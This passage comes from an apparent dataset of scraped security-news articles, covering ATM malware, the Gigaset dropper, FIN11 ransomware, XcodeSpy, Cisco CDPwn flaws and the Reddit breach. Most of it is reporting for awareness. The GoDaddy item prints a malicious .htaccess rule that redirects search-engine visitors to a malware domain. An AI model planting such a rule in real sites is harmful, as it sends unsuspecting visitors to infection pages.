the hack detailed their findings at the Chaos Computing Congress in Hamburg, Germany recently. They said that the thieves cut holes in the fascia to access a USB port and then uploaded malware to the machines. The malware creates a backdoor that can be accessed on the front panel. ""These researchers explained that the malware allowed the thieves to create a unique interface on the ATMs by typing in a 12-digit code. This interface allowed for withdrawal and also showed the criminals the amount of money and each bill denomination inside the machines. This meant the thieves could save time by only taking the highest value bills."" Dara Kerr from CNET news reported. Once the thieves finished their theft at a cash machine, they would patch up the hole to allow the same exploit to be used on other machines. This indicates that the criminal crew is highly familiar with the ATMs mechanism. The malware does not appear to harvest customer PINs or other sensitive data and now some banks have upgraded their ATMs to prevent them from booting from external USB drives. ",Malware Pre-Installed Malware Dropper Found On German Gigaset Android Phones,https://thehackernews.com/2021/04/pre-installed-malware-dropper-found-on.html,"In what appears to be a fresh twist in Android malware, users of Gigaset mobile devices are encountering unwanted apps that are being downloaded and installed through a pre-installed system update app. ""The culprit installing these malware apps is the Update app, package name com.redstone.ota.ui, which is a pre-installed system app,"" Malwarebytes researcher Nathan Collier said. ""This app is not only the mobile device's system updater, but also an auto installer known as Android/PUP.Riskware.Autoins.Redstone."" The development was first reported by German author and blogger Günter Born last week. While the issue seems to be mainly affecting Gigaset phones, devices from a handful of other manufacturers appear to be impacted as well. The full list of devices that come with the pre-installed auto-installer includes Gigaset GS270, Gigaset GS160, Siemens GS270, Siemens GS160, Alps P40pro, and Alps S20pro+. According to Malwarebytes, the Update app installs three different versions of a trojan (""Trojan.Downloader.Agent.WAGD"") that's capable of sending SMS and WhatsApp messages, redirecting users to malicious game websites, and downloading additional malware-laced apps. ""The malicious WhatsApp messages are most likely in order to further spread the infection to other mobile devices,"" Collier noted. Users have also reported experiencing a second separate strain of malware called ""Trojan.SMS.Agent.YHN4"" on their mobile devices after landing on gaming websites redirected by the aforementioned WAGD trojan, which mirrors the latter's SMS and WhatsApp messaging functionality to propagate the malware. Unlike third-party apps downloaded from the Google Play Store, system apps cannot be easily removed from mobile devices without resorting to tools like Android Debug Bridge (ADB). For its part, Gigaset confirmed the malware attack, stating that an update server used by the devices to fetch software updates was compromised and that only devices that relied on that specific update server were affected. The company has since fixed the issue and is expected to push an update to remove the malware from infected phones, according to Born. The development comes a week after cybersecurity researchers revealed a new Android malware that was found to pilfer users' photos, videos, and GPS locations by sending a fraudulent notification posing as a ""System Update"" that is ""Searching for update."" When reached for a response, Gigaset said it's investigating the software supply chain incident, adding ""we are working closely with IT forensic experts and the relevant authorities. We will inform the affected users as quickly as possible and provide information on how to resolve the problem."" ""It is also important to mention at this point that, according to current knowledge, the incident only affects older devices. We currently assume that the devices GS110, GS185, GS190, GS195, GS195LS, GS280, GS290, GX290, GX290plus, GX290 PRO, GS3 and GS4 are not affected,"" it noted. ",Malware FIN11 Hackers Spotted Using New Techniques In Ransomware Attacks,https://thehackernews.com/2020/10/fin11-hackers-spotted-using-new.html,"A financially-motivated threat actor known for its malware distribution campaigns has evolved its tactics to focus on ransomware and extortion. According to FireEye's Mandiant threat intelligence team, the collective — known as FIN11 — has engaged in a pattern of cybercrime campaigns at least since 2016 that involves monetizing their access to organizations' networks, in addition to deploying point-of-sale (POS) malware targeting financial, retail, restaurant, and pharmaceutical sectors. ""Recent FIN11 intrusions have most commonly led to data theft, extortion and the disruption of victim networks via the distribution of CLOP ransomware,"" Mandiant said. Although FIN11's activities in the past have been tied to malware such as FlawedAmmyy, FRIENDSPEAK, and MIXLABEL, Mandiant notes significant overlap in TTPs with another threat group that cybersecurity researchers call TA505, which is behind the infamous Dridex banking Trojan and Locky ransomware that's delivered through malspam campaigns via the Necurs botnet. It's worth pointing that Microsoft orchestrated the takedown of the Necurs botnet earlier this March in an attempt to prevent the operators from registering new domains to execute further attacks in the future. High-Volume Malspam Campaigns FIN11, in addition to leveraging a high-volume malicious email distribution mechanism, has expanded its targeting to native language lures coupled with manipulated email sender information, such as spoofed email display names and email sender addresses, to make the messages appear more legitimate, with a strong bent towards attacking German organizations in their 2020 campaigns. For instance, the adversary triggered an email campaign with email subjects such as ""research report N-[five-digit number]"" and ""laboratory accident"" in January 2020, followed by a second wave in March using phishing emails with the subject line ""[pharmaceutical company name] 2020 YTD billing spreadsheet."" ""FIN11's high-volume email distribution campaigns have continually evolved throughout the group's history,"" Andy Moore, senior technical analyst at Mandiant Threat Intelligence, told The Hacker News via email. ""Although we have not independently verified the connection, there is substantial public reporting to suggest that until sometime in 2018, FIN11 relied heavily on the Necurs botnet for malware distribution. Notably, observed downtime of the Necurs botnet has directly corresponded to lulls in the activity we attribute to FIN11."" Indeed, as per Mandiant's research, FIN11's operations appear to have ceased entirely from mid-March 2020 through late May 2020, before picking up again in June via phishing emails containing malicious HTML attachments to deliver malicious Microsoft Office files. The Office files, in turn, made use of macros to fetch the MINEDOOR dropper and the FRIENDSPEAK downloader, which then dispatched the MIXLABEL backdoor on the infected device. A Shift to Hybrid Extortion In recent months, however, FIN11's monetization efforts have resulted in a number of organizations infected by CLOP ransomware, in addition to resorting to hybrid extortion attacks — combining ransomware with data theft — in a bid to force businesses into acquiescing to extortion payments that range from a few hundred thousand dollars up to 10 million dollars. ""FIN11's monetization of intrusions via ransomware and extortion follows a broader trend among financially motivated actors,"" Moore said. ""Monetization strategies that have been more common historically, such as the deployment of point-of-sale malware, limit criminals to targeting victims in certain industries, whereas ransomware distribution can allow actors to profit from an intrusion into the network of nearly any organization. That flexibility, in combination with increasingly frequent reports of ballooning ransom payments, makes it an extremely attractive scheme for financially motivated actors,"" he added. What's more, FIN11 is purported to have made use of a wide variety of tools (e.g., FORKBEARD, SPOONBEARD, and MINEDOOR) purchased from underground forums, thereby making attribution difficult or accidentally conflating activities of two disparate groups based on similar TTPs or indicators of compromise. An Actor of Likely CIS Origin As for the roots of FIN11, Mandiant stated with ""moderate confidence"" that the group operates out of the Commonwealth of Independent States (CIS) owing to the presence of Russian-language file metadata, avoidance of CLOP deployments in CIS countries, and the dramatic fall in activity coinciding the Russian New Year and Orthodox Christmas holiday period between January 1-8. ""Barring some sort of disruption to their operations, it is highly likely that FIN11 will continue to attack organizations with an aim to deploy ransomware and steal data to be used for extortion,"" Moore said. ""As the group has regularly updated their TTPs to evade detections and increase the effectiveness of their campaigns, it is also likely that these incremental changes will continue. Despite these changes, however, recent FIN11 campaigns have consistently relied on the use of macros embedded in malicious Office documents to deliver their payloads."" ""Along with other security best practices, organizations can minimize the risk of being compromised by FIN11 by training users to identify phishing emails, disabling Office macros, and implementing detections for the FRIENDSPEAK downloader."" ",Malware GoDaddy websites Compromised with Malware,https://thehackernews.com/2011/09/godaddy-websites-compromised-with.html,"GoDaddy websites Compromised with Malware Many sites hosted on GoDaddy shared servers getting compromised today with a conditional redirection to sokoloperkovuskeci.com.In all 445 cases the .htaccess file (a main Apache web server configuration file) was modified to redirect users to a malware site when they were referred by one of a list of search engines. These redirections attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain), we are only seeing them on GoDaddy hosted sites. So it looks like a compromise on their own servers (similar to what has happened in the past). This is caused by this entry that is added to the .htaccess file of the compromised sites: RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* https://sokoloperkovuskeci.com/in.php?g=916 [R,L] The malware checks if anyone visiting the infected site is coming from a Google search (or Yahoo, or Bing) and if they are, redirects them to that domain (sokoloperkovuskeci.com). In there, the user gets redirected again to other locations to get their browsers infected too. So you have to fix your site asap to protect your own users. GoDaddy says they are working with customers to resolve the issue, but if you have a GoDaddy account you should check on this, minimally by Googling for your site and following the link (only if your browser is all patched up and you have sufficient other protections).DomainNameWire also smartly recommends that you check with Google, other search engines and security companies to make sure you haven't been blacklisted. ",Malware This 20-year-old Student Has Written 100 Malware Programs in Two Years,https://thehackernews.com/2015/07/student-hacker.html,"Security firm Trend Micro has identified a 20-year-old Brazilian college student responsible for developing and distributing over 100 Banking Trojans selling each for around US$300. Known online as 'Lordfenix', 'Hacker's Son' and 'Filho de Hacker', the computer science student first began his career by posting in forums, asking for programming help for a Trojan he was developing, researchers said. Developed More than 100 Trojans However, Lordfenix has ""grown quite confident in his skills"" and began developing and distributing malware tailored to pilfer financial information since at least 2013. ""Based on our research, Lordfenix has created more than 100 different banking Trojans, not including his other malicious tools, since April 2013,"" Trend Micro says. ""With each Trojan costing around R$1,000 (roughly $320), this young cybercriminal channeled his talent in programming into a lucrative, illegal venture."" Trend Micro has also provided an image of the hacker's Facebook wall post (given below) in which the hacker shows a considerable amount of local currency. Hacker is Offering Free Versions of Banking Trojans In order to expand his operation, Lordfenix has now begun offering free versions of fully-functional Banking Trojan source code other wanna-be cyber criminals on the underground forum. The free versions of the Trojan can be used to steal login details from customers of four different Brazilian banking websites including HSBC Brazil, Bank of Brazil, and Caixa. For access to other financial institutions, 'clients' have to pay for a more powerful tool, TSPY_BANKER.NJH. TSPY_BANKER.NJH is a Trojan capable to identify when a user enters any of a target bank's URLs into their browser. The malware then shuts down the browser window (if it is running on Google Chrome), displays an error message, and then opens a fake Chrome window. Once the victim enters the login details into the fake window, the information is sent back to the attackers address via email. As an extra precaution, Lordfenix's malware also includes a software program to terminate a security process called GbpSV.exe, which is used by large number of Brazilian banks in an effort to keep their online customer data secure. Malware Threat to Online Banking is Growing rapidly and countries like Brazil, where almost half of all financial transactions are conducted online, have come up as a boon for hackers. ",Malware Hacking Fiverr.com Accounts — Vulnerability Puts $50 Million Company At Risk,https://thehackernews.com/2014/08/hacking-fiverrcom-accounts_16.html,"Fiverr.com, a global online marketplace which provides a platform for people to sell their services for five dollars per job, is vulnerable to a critical web application vulnerability that puts its millions of users at risk. Fiverr recently raised $30 million in a third round of institutional funding to continue supporting the new version of its marketplace, but the company ignored the advance warning of the critical bug reported responsibly by a vulnerability hunter and fails to patch up their website before his public release. There are endless numbers of people providing services on Fiverr website, such as graphic design, language translation, illustration, blogging and a lot more that start from just $5 but can go much higher, depending on complexity, seller rating, and type of work. According to a security researcher Mohamed Abdelbaset, an Information Security Evangelist from Egypt, told The Hacker News that Fiverr website is vulnerable to CSRF (Cross-site request forgery) vulnerability that allows him to compromise any user account easily. Cross-Site Request Forgery (CSRF) is a method of attacking a Web site in which an intruder masquerades as a legitimate and trusted user. All the attacker need to do is get the target browser to make a request to your website on their behalf. If they can either: Convince your users to click on a HTML page they've constructed Insert arbitrary HTML in a target website that your users visit Not too difficult, is it? In this case, an attacker only needs to know the Fiverr profile link of the victim in order to exploit the vulnerability. Using which the attacker will craft and host a exploit webpage on his own server, Mohamed said while demonstrating the vulnerability to THN. If the victim has already logged into his Fiverr account on the same browser, the CSRF vulnerability will silently replace the victim's Fiverr account email with the attacker's email address. Once done, the attacker can take over the victim's account just by changing the account password from ""Password reset"" option from the website. The researcher has also provided a video demonstration as a Proof of Concept. The vulnerability is critical and should be fixed as soon as possible. ",Vulnerability Scranos: New Rapidly Evolving Rootkit-Enabled Spyware Discovered,https://thehackernews.com/2019/04/scranos-rootkit-spyware.html,"A new powerful rootkit-enabled spyware operation has been discovered wherein hackers are distributing multifunctional malware disguised as cracked software or trojanized app posing as legitimate software like video players, drivers and even anti-virus products. While the rootkit malware—dubbed Scranos—which was first discovered late last year, still appears to be a work in progress, it is continuously evolving, testing new components and regularly making an improvement to old components, which makes it a significant threat. Scranos features a modular design that has already gained capabilities to steal login credentials and payment accounts from various popular services, exfiltrate browsing history and cookies, get YouTube subscribers, display ads, as well as download and execute any payload. According to a 48 page in-depth report Bitdefender shared with The Hacker News prior to its release, the malware gains persistence on infected machines by installing a digitally-signed rootkit driver. Researchers believe attackers obtained the valid digital code-signing certificate fraudulently, which was originally issued to Yun Yu Health Management Consulting (Shanghai) Co., Ltd. and has not been revoked at the time of writing. ""The rootkit registers a Shutdown callback to achieve persistence. At shutdown, the driver is written to disk, and a start-up service key is created in the Registry,"" the researchers say. Upon infection, the rootkit malware injects a downloader into a legitimate process which then communicates with the attacker-controlled Command-and-Control (C&C) server and downloads one or more payloads. Here we have listed a few data and password-stealing payloads: Password and Browsing History Stealing Payload — The main dropper steals browser cookies and login credentials from Google Chrome, Chromium, Mozilla Firefox, Opera, Microsoft Edge, Internet Explorer, Baidu Browser and Yandex. It can also steal cookies and login info from victims' accounts on Facebook, YouTube, Amazon, and Airbnb. Extension Installer Payload — This payload installs adware extensions in Chrome and injects malicious or malware-laden ads on all webpages users visit. A few samples also found installing fake browser extensions, such as Chrome Filter, Fierce-tips and PDF Maker. Steam Data Stealer Payload — This component steals and sends victims' Steam account credentials and information, including the list of installed apps and games, as well as hardcoded version, to the attacker's server. Malware Interacts with Facebook and YouTube on Victims' Behalf Some other payloads can even interact with various websites on the victim's behalf, such as: YouTube subscriber payload — This payload manipulates YouTube pages by running Chrome in debugging mode, instructing the browser to take various actions on a webpage like starting a video, muting a video, subscribing to a channel, and clicking ads. Facebook Spammer Payload — Using collected cookies and other tokens, attackers can command malware to send Facebook friend requests to other users. It can also send private messages to the victim's Facebook friends with links to malicious Android APKs. Android Adware App — Disguised as the legitimate ""Accurate scanning of QR code"" app available on Google Play Store, the malware app aggressively displays ads, tracks infected victims and uses same C&C server as the Windows malware. Scranos Steals Payment Information from Popular Websites Here's the list of DLLs contained in the main dropper: Facebook DLL — This DLL extracts information about the user Facebook accounts including their payment accounts, their list of friends, and if they are an administrator of a page. Amazon DLL — This DLL extracts information from the user's Amazon account. Researchers even found a version of this DLL that has been designed to extract information from logged-in Airbnb accounts. According to the telemetry gathered by Bitdefender researchers, Scranos is targeting users worldwide, but ""it seems more prevalent in India, Romania, Brazil, France, Italy, and Indonesia."" The oldest sample of this malware traced back to November 2018, with a massive spike in December and January, but in March 2019, Scranos was started pushing other strains of malware, which researchers say is ""a clear indicator that the network is now affiliated with third parties in pay-per install schemes."" ",Cyber_Attack Hackers Infecting Apple App Developers With Trojanized Xcode Projects,https://thehackernews.com/2021/03/hackers-infecting-apple-app-developers.html,"Cybersecurity researchers on Thursday disclosed a new attack wherein threat actors are leveraging Xcode as an attack vector to compromise Apple platform developers with a backdoor, adding to a growing trend that involves targeting developers and researchers with malicious attacks. Dubbed ""XcodeSpy,"" the trojanized Xcode project is a tainted version of a legitimate, open-source project available on GitHub called TabBarInteraction that's used by developers to animate iOS tab bars based on user interaction. ""XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor on the developer's macOS computer along with a persistence mechanism,"" SentinelOne researchers said. Xcode is Apple's integrated development environment (IDE) for macOS, used to develop software for macOS, iOS, iPadOS, watchOS, and tvOS. Earlier this year, Google's Threat Analysis group uncovered a North Korean campaign aimed at security researchers and exploit developers, which entailed the sharing of a Visual Studio project designed to load a malicious DLL on Windows systems. The doctored Xcode project does something similar, only this time the attacks have singled out Apple developers. Besides including the original code, XcodeSpy also contains an obfuscated Run Script that's executed when the developer's build target is launched. The script then contacts an attacker-controlled server to retrieve a custom variant of the EggShell backdoor on the development machine, which comes with capabilities to record information from the victim's microphone, camera, and keyboard. ""XcodeSpy takes advantage of a built-in feature of Apple's IDE which allows developers to run a custom shell script on launching an instance of their target application,"" the researchers said. ""While the technique is easy to identify if looked for, new or inexperienced developers who are not aware of the Run Script feature are particularly at risk since there is no indication in the console or debugger to indicate execution of the malicious script."" SentinelOne said it identified two variants of the EggShell payload, with the samples uploaded to VirusTotal from Japan on August 5 and October 13 last year. Additional clues point to one unnamed U.S. organization that's said to have been targeted using this campaign between July and October 2020, with other developers in Asia likely to be targeted as well. Adversaries have previously resorted to tainted Xcode executables (aka XCodeGhost) to inject malicious code into iOS apps compiled with the infected Xcode without the developers' knowledge, and subsequently use the infected apps to collect information from the devices once they are downloaded and installed from the App Store. Then in August 2020, researchers from Trend Micro unearth a similar threat that spread via modified Xcode projects, which, upon building, were configured to install a mac malware called XCSSET to steal credentials, capture screenshots, sensitive data from messaging and note taking apps, and even encrypt files for a ransom. Like XCSSET, XcodeSpy takes an easier route, since the goal appears to be to strike the developers themselves, although the ultimate objective behind the exploitation and the identity of the group behind it remains unclear as yet. ""Targeting software developers is the first step in a successful supply chain attack. One way to do so is to abuse the very development tools necessary to carry out this work,"" the researchers said. ""It is entirely possible that XcodeSpy may have been targeted at a particular developer or group of developers, but there are other potential scenarios with such high-value victims. Attackers could simply be trawling for interesting targets and gathering data for future campaigns, or they could be attempting to gather AppleID credentials for use in other campaigns that use malware with valid Apple Developer code signatures."" ",Malware "5 High Impact Flaws Affect Cisco Routers, Switches, IP Phones and Cameras",https://thehackernews.com/2020/02/cisco-cdp-vulnerabilities.html,"Several Cisco-manufactured network equipments have been found vulnerable to five new security vulnerabilities that could allow hackers to take complete control over them, and subsequently, over the enterprise networks they power. Four of the five high-severity bugs are remote code execution issues affecting Cisco routers, switches, and IP cameras, whereas the fifth vulnerability is a denial-of-service issue affecting Cisco IP phones. Collectively dubbed 'CDPwn,' the reported vulnerabilities reside in the various implementations of the Cisco Discovery Protocol (CDP) that comes enabled by default on virtually all Cisco devices and can not be turned OFF. Cisco Discovery Protocol (CDP) is an administrative protocol that works at Layer 2 of the Internet Protocol (IP) stack. The protocol has been designed to let devices discover information about other locally attached Cisco equipment in the same network. According to a report Armis research team shared with The Hacker News, the underlying CDP implementations contain buffer overflow and format string vulnerabilities that could let remote attackers on the same network execute arbitrary code on the vulnerable devices by sending malicious unauthenticated CDP packets. The list of CDPwn Cisco vulnerabilities affecting tens of millions of devices widely deployed in enterprise networks is as follow: Cisco NX-OS Stack Overflow in the Power Request TLV (CVE-2020-3119) Cisco IOS XR Format String vulnerability in multiple TLVs (CVE-2020-3118) Cisco IP Phones Stack Overflow in PortID TLV (CVE-2020-3111) Cisco IP Cameras Heap Overflow in DeviceID TLV (CVE-2020-3110) Cisco FXOS, IOS XR, and NX-OS Resource Exhaustion in the Addresses TLV (CVE-2020-3120) To be noted, since CDP is a Data Link layer 2 protocol that can't cross the boundaries of a local area network, an attacker first needs to be on the same network to leverage CDPwn vulnerabilities. However, after gaining an initial foothold in a targeted network using separate vulnerabilities, attackers can exploit CDPwn against network switches to break network segmentation and move laterally across the corporate networks to other sensitive systems and data. ""Gaining control over the switch is useful in other ways. For example, the switch is in a prime position to eavesdrop on network traffic that traverses through the switch, and it can even be used to launch man-in-the-middle attacks on the traffic of devices that traverses through the switch,"" the researchers said. ""An attacker can look to move laterally across segments and gain access to valuable devices like IP phones or cameras. Unlike switches, these devices hold sensitive data directly, and the reason to take them over can be a goal of an attacker, and not merely a way to break out of segmentation."" Additionally, CDPwn flaws also allow attackers to: Eavesdrop on voice and video data/calls and video feed from IP phones and cameras, capture sensitive conversations or images. Exfiltrate sensitive corporate data flowing through the corporate network's switches and routers. Compromise additional devices by leveraging man-in-the-middle attacks to intercept and alter traffic on the corporate switch. Besides releasing a detailed technical report on the issues, the Armis research team has also shared videos of explanation and demonstration of the flaws, as embedded above. After closely working with Armis researchers over the last few months to develop security patches, Cisco today released software updates for all of its affected products. Though Cisco has also provided some mitigation information, affected administrators are still highly recommended to install the latest software updates to completely protect their valuable networks against malware and emerging online threats. ",Vulnerability Using LabVIEW? Unpatched Flaw Allows Hackers to Hijack Your Computer,https://thehackernews.com/2017/08/hacking-labview-vi-file.html,"If you're an engineer and use LabVIEW software to design machines or industrial equipments, you should be very suspicious while opening any VI (virtual instrument) file. LabVIEW, developed by American company National Instruments, is a visual programming language and powerful system-design tool that is being used worldwide in hundreds of fields and provides engineers with a simple environment to build measurement or control systems Security researchers from Cisco's Talos Security Intelligence have discovered a critical vulnerability in LabVIEW software that could allow attackers to execute malicious code on a target computer, giving them full control of the system. Identified as CVE-2017-2779, the code execution vulnerability could be triggered by opening a specially crafted VI file, a proprietary file format used by LabVIEW. The vulnerability originates because of memory corruption issue in the RSRC segment parsing functionality of LabVIEW. Modulating the values within the RSRC segment of a VI file causes a controlled looping condition, which results in an arbitrary null write. ""A specially crafted LabVIEW virtual instrument file (with the *.vi extension) can cause an attacker controlled looping condition resulting in an arbitrary null write,"" Talos researchers explain. ""An attacker controlled VI file can be used to trigger this vulnerability and can potentially result in code execution."" Talos researchers have successfully tested the vulnerability on LabVIEW 2016 version 16.0, but National Instruments has refused to consider this issue as a vulnerability in their product and had no plans to release any patch to address the flaw. However, the issue should not be ignored, because the threat vector is almost similar to many previously disclosed Microsoft Office vulnerabilities, in which victims got compromised after opening malicious MS Word file received via an email or downloaded from the Internet. ""The consequences of a successful compromise of a system that interacts with the physical world, such as a data acquisition and control systems, may be critical to safety,"" the researchers write. ""Organisations that deploy such systems, even as pilot projects, should be aware of the risk posed by vulnerabilities such as these and adequately protect systems."" Since there is no patch available, the LabVIEW users are left with only one option—be very careful while opening any VI file you receive via an email. For more technical details about the vulnerability, you can head on to Cisco Talos' advisory. ",Malware Vulnerability Allows Anyone to DDoS Websites Using Facebook Servers,https://thehackernews.com/2014/04/vulnerability-allows-anyone-to-ddos.html,"Reading a 'Note' created by anyone on the Facebook could trick you automatically to do malicious attacks against others unknowingly. A Security researcher Chaman Thapa, also known as chr13 claims that the flaw resides in 'Notes' section of the most popular social networking site - Facebook, that could allow anyone to launch the distributed denial-of-service (DDoS) attack of more than 800 Mbps Bandwidth on any website. A Distributed Denial-of-Service (DDoS) attack is one in which multiple compromised systems attacks a single target system or service to make it unavailable to its intended users. The flood of incoming requests essentially forces the target system or service to shut down, thereby denying service to the system to its legitimate users. While demonstrating the vulnerability on his blog, he explained that Facebook allows its users to include tags inside the post in order to draft a note with beautiful related images from any source. Facebook basically downloads external images from the original source for the first time only, and then cache them, but if the image url have dynamic parameters, then Facebook cache mechanism could be bypassed to force the Facebook servers to download all included images each time whenever anybodys open the note in its browser. 'Facebook will only cache the image once however using random get parameters the cache can be by-passed and the feature can be abused to cause a huge HTTP GET flood.' he said. DDoS FACTOR, A SCENARIO Let's suppose if you want to DDoS a website target.com, that have an image of 1 MB Size on its server. An attacker can create a Facebook Note with some text, including same image multiple times with dynamic parameters, i.e. This way one can force Facebook servers to load 1 mb of file 1000 times in one pageview and if 100 Facebook users are reading the same crafted note at the same time, then Facebook servers will be forced to download 1 x 1000 x 100 = 100,000 Mb or 97.65Gb bandwidth within few seconds from the targeted servers. 400 MBPS DDoS ATTACK DEMO Researcher demonstrated the proof-of-concept with 400 Mbps attack, by attacking on his own web server. Stats shown below: The factor and danger of DDoS attack could be even higher when the image is replaced by a pdf or video of larger size, in case Facebook would crawl a huge file but the user gets nothing. Facebook allows a user to create maximum of 100 Notes in a short span of time and each Note could support more than 1000 links, but because there is no captcha for the Facebook Notes creation, so all this operation can be performed automatically and an attacker could easily creates hundreds of notes using multiple users at the time of performing attack. ""It seems there is no restriction put on Facebook servers and with so many servers crawling at once we can only imagine how high this traffic can get"" he concluded. STILL UNPATCHED AND DON'T EXPECT ANY PATCH FROM FACEBOOK Unfortunately, Facebook has no plans to fix this critical vulnerability, ""In the end, the conclusion is that there's no real way to us fix this that would stop attacks against small consumer grade sites without also significantly degrading the overall functionality,"" Facebook replied to the researcher. Similar kind of attack was noticed in mid of 2011 year when a security penetration tester at Italian security firm AIR Sicurezza Informatica discovered flaws in Google's Plus servers that allowed hackers to exploit the search giant's bandwidth and launch a distributed denial-of-service (DDoS) attack on a server of their choice. ",Vulnerability Dutch Police arrested TorRAT Malware Gang for stealing over Million Dollar,https://thehackernews.com/2013/10/dutch-police-arrested-torrat-malware.html,"The TorRAT malware was first appeared in 2012 as spying tool only. But from August 2012, Bitcoin Mining feature was added and it became a powerful hacking tool that was commonly associated with attacks on Financial institutions. ab This year TorRat Malware targeted two out of three major Banks in the Netherlands and the criminals stole over Million Dollars from user' Banking Accounts. The Dutch police has arrested four men from Alkmaar, Haarlem, Woubrugge and Roden on last Monday, who are suspected of involvement in the large scale digital fraud and money laundering case using TorRat Malware. Using Spear Phishing techniques, gang targeted the victims to access their computers and the Financial accounts. The gang used anonymous VPN services, Bitcoins, TorMail and the Tor network itself to remain anonymous. Malware is also capable of manipulating the information during online banking, can secretly add new payment orders and also able to modify existing orders. To defend the detection from Antivirus softwares, TorRat uses the ZeuS malware in its attack. The technique was used to divert the focus of researchers to remove ZeuS infection, rather than the unknown malware on the system. Some of the stolen money was converted by criminals to (56 BTC worth around 7700 Euros) Bitcoin virtual currency, which are now seized by Dutch police. Police also mentioned that, one of arrested criminal having his own Bitcoin exchange service. The TorRAT malware has been known to be distributed in multiple ways. In April, TorRat was in news for hijacking twitter accounts. After infecting a vulnerable computers, the TorRAT malware hijacks the Twitter user's account and share links that lead to attack websites that attempt to inject TorRAT malware into the victim's computer. The main reason why this particular attack is so effective is because victims are essentially receiving links to the TorRAT malware from sources they trust; accounts that they follow on Twitter. TorRAT malware involves using Man-in-the-Browser (MitB) tactics to infect computers through vulnerabilities in their Web browser. These kinds of attacks were used to take over a victim's online banking account. They made more than 150 fraudulent transactions for victim's accounts and Police said that, because Gang was operating from the Netherlands, so tracking them become possible. ",Vulnerability A New Spyware is Targeting Telegram and Psiphon VPN Users in Iran,https://thehackernews.com/2021/06/a-new-spyware-is-targeting-telegram-and.html,"Threat actors with suspected ties to Iran have been found to leverage instant messaging and VPN apps like Telegram and Psiphon to install a Windows remote access trojan (RAT) capable of stealing sensitive information from targets' devices since at least 2015. Russian cybersecurity firm Kaspersky, which pieced together the activity, attributed the campaign to an advanced persistent threat (APT) group it tracks as Ferocious Kitten, a group that has singled out Persian-speaking individuals allegedly based in the country while successfully operating under the radar. ""The targeting of Psiphon and Telegram, both of which are quite popular services in Iran, underlines the fact that the payloads were developed with the purpose of targeting Iranian users in mind,"" Kaspersky's Global Research and Analysis Team (GReAT) said. ""Moreover, the decoy content displayed by the malicious files often made use of political themes and involved images or videos of resistance bases or strikes against the Iranian regime, suggesting the attack is aimed at potential supporters of such movements within the country."" Kaspersky's findings emerge from two weaponized documents that were uploaded to VirusTotal in July 2020 and March 2021 that come embedded with macros, which, when enabled, drop next-stage payloads to deploy a new implant called MarkiRat. The backdoor allows adversaries broad access to a victim's personal data, comprising features to record keystrokes, capture clipboard content, download and upload files, as well as the ability to execute arbitrary commands on the victim machine. In what appears to be an attempt to expand their arsenal, the attackers also experimented with different variants of MarkiRat that were found to intercept the execution of apps like Google Chrome and Telegram to launch the malware and keep it persistently anchored to the computer at the same time also making it much harder to be detected or removed. One of the discovered artifacts also includes a backdoored version of Psiphon; an open-source VPN tool often used to evade internet censorship. Another recent variant involves a plain downloader that retrieves an executable from a hardcoded domain, with the researchers noting that the ""use of this sample diverges from those used by the group in the past, where the payload was dropped by the malware itself, suggesting that the group might be in the process of changing some of its TTPs."" What's more, the command-and-control infrastructure is also said to have hosted Android applications in the form of DEX and APK files, raising the possibility that the threat actor is also simultaneously developing malware aimed at mobile users. Interestingly, the tactics adopted by the adversary overlap with other groups that operate against similar targets, such as Domestic Kitten and Rampant Kitten, with Kaspersky finding parallels in the way the actor used the same set of C2 servers over extended periods of time and attempted to gather information from KeePass password manager. ""Ferocious Kitten is an example of an actor that operates in a wider ecosystem intended to track individuals in Iran,"" the researchers concluded. ""Such threat groups do not appear to be covered that often and can therefore get away with casually reusing infrastructure and toolsets without worrying about them being taken down or flagged by security solutions."" ",Malware "Reddit Hacked – Emails, Passwords, Private Messages Stolen",https://thehackernews.com/2018/08/hack-reddit-account.html,"Another day, another significant data breach. This time the victim is Reddit... seems someone is really pissed off with Reddit's account ban policy or bias moderators. Reddit social media network today announced that it suffered a security breach in June that exposed some of its users' data, including their current email addresses and an old 2007 database backup containing usernames and hashed passwords. According to Reddit, the unknown hacker(s) managed to gain read-only access to some of its systems that contained its users' backup data, source code, internal logs, and other files. In a post published to the platform Wednesday, Reddit Chief Technology Officer Christopher Slowe admitted that the hack was a serious one, but assured its users that the hackers did not gain access to Reddit systems. ""[The attackers] were not able to alter Reddit information, and we have taken steps since the event to further lock down and rotate all production secrets and API keys, and to enhance our logging and monitoring systems,"" Slowe wrote. According to Slowe, the most significant data contained in the backup was account credentials (usernames and their corresponding salted and hashed passwords), email addresses and all content including private messages. Attacker Bypassed SMS-based Two-Factor Authentication Reddit learned about the data breach on June 19 and said that the attacker compromised a few of the Reddit employees' accounts with its cloud and source code hosting providers between June 14 and June 18. The hack was accomplished by intercepting SMS messages that were meant to reach Reddit employees with one-time passcodes, eventually circumventing the two-factor authentication (2FA) Reddit had in place attacks. The security breach should be a wake-up call to those who still rely on SMS-based authentication and believes it is secure. It's time for you to move on from this method and switch to other non-SMS-based two-factor authentication. Reddit is also encouraging users to move to token-based two-factor authentication, which involves your mobile phone generating a unique one-time passcode over an app. Reddit said that users can follow a few steps mentioned on the breach announcement page to check if their accounts were involved. Moreover, Reddit will reset passwords for users who may have had their login credentials stolen in the breach, and also directly notify all affected users with tips on how they can protect themselves. ",Data_Breaches Warning: Researcher Drops phpMyAdmin Zero-Day Affecting All Versions,https://thehackernews.com/2019/09/phpmyadmin-csrf-exploit.html,"A cybersecurity researcher recently published details and proof-of-concept for an unpatched zero-day vulnerability in phpMyAdmin—one of the most popular applications for managing the MySQL and MariaDB databases. phpMyAdmin is a free and open source administration tool for MySQL and MariaDB that's widely used to manage the database for websites created with WordPress, Joomla, and many other content management platforms. Discovered by security researcher and pentester Manuel Garcia Cardenas, the vulnerability claims to be a cross-site request forgery (CSRF) flaw, also known as XSRF, a well-known attack wherein attackers 